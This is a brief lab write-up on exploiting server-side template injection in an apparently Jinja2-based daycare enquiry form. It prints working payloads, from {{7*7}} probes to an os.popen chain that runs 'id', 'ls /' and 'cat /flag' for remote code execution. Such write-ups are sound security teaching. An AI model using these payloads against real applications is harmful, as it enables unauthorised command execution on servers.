Lab can be found at: https://webverselabs-pro.com/
We land upon a page which allows us to make an enquiry for a daycare spot. Seems like a good place to test.
Using the payload below gives us a good indication of what’s happening here. Server-side template injection:
{{7*7}}
We see 49 is rendered on the page, so this does prove our payload is working.
Next, I try to print 7 “7's” with the next payload:
{{7*'7'}}
It renders. This proves that we are likely dealing with Jinja2. This article says that Jinja runs inside python. So now, I began looking for an appropriate payload.
Just out of curiosity, I wanted to see if I could force an error. I used {{ as my payload. This caused an internal error (500) but debugging was off, so I did not get anything verbose:
Next, I found an article that used a python payload to exploit this kind of SSTI and ran it in the name field:
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
Of course, now we could essentially get RCE:
Next I ran an ls command which showed that the flag.txt file was on the root directory:
{{request.application.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
So now, I could simply cat the flag.txt file:
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}
Thanks for following along!
